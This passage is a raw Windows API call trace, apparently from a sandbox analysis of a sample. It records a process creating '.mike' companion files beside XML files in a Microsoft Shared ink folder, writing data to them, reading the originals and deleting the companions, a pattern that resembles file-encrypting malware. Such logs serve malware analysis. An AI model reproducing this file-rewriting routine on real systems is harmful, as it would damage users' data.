SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.419] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), fInfoLevelId=0x0, lpFileInformation=0x2110bb0 | out: lpFileInformation=0x2110bb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.419] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.419] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.419] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.420] GetFileType (hFile=0x264) returned 0x1 [0045.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.420] GetFileType (hFile=0x264) returned 0x1 [0045.420] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.420] WriteFile (in: hFile=0x264, lpBuffer=0x2111ab0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2111ab0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.421] CloseHandle (hObject=0x264) returned 1 [0045.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.421] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), fInfoLevelId=0x0, lpFileInformation=0x2111598 | out: lpFileInformation=0x2111598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.421] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.421] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.421] GetFileType (hFile=0x264) returned 0x1 [0045.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.422] GetFileType (hFile=0x264) returned 0x1 [0045.422] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.422] ReadFile (in: hFile=0x264, lpBuffer=0x2112be4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2112be4*, lpNumberOfBytesRead=0x2af080*=0xd7, lpOverlapped=0x0) returned 1 [0045.422] CloseHandle (hObject=0x264) returned 1 [0045.423] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.423] GetFileType (hFile=0x264) returned 0x1 [0045.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.423] GetFileType (hFile=0x264) returned 0x1 [0045.423] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.423] WriteFile (in: hFile=0x264, lpBuffer=0x2115e44*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2115e44*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0045.423] CloseHandle (hObject=0x264) returned 1 [0045.424] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.424] GetFileType (hFile=0x264) returned 0x1 [0045.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.424] GetFileType (hFile=0x264) returned 0x1 [0045.425] WriteFile (in: hFile=0x264, lpBuffer=0x2119078*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2119078*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.425] CloseHandle (hObject=0x264) returned 1 [0045.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.426] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe546e2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe546e2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe546e2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.426] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x211a834 | out: lpFileInformation=0x211a834*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe546e2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe546e2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe546e2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.427] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", dwFileAttributes=0x80) returned 0 [0045.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.428] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe546e2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe546e2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe546e2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike", lpFilePart=0x0) returned 0x51 [0045.428] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.mike")) returned 1 [0045.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.430] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.474] GetFileType (hFile=0x264) returned 0x1 [0045.474] GetFileType (hFile=0x264) returned 0x1 [0045.474] CloseHandle (hObject=0x264) returned 1 [0045.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.474] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.474] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), fInfoLevelId=0x0, lpFileInformation=0x211c9bc | out: lpFileInformation=0x211c9bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f)) returned 1 [0045.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), fInfoLevelId=0x0, lpFileInformation=0x211ccec | out: lpFileInformation=0x211ccec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f)) returned 1 [0045.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.475] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.475] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.476] GetFileType (hFile=0x264) returned 0x1 [0045.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.476] GetFileType (hFile=0x264) returned 0x1 [0045.476] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.476] WriteFile (in: hFile=0x264, lpBuffer=0x211dbec*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x211dbec*, 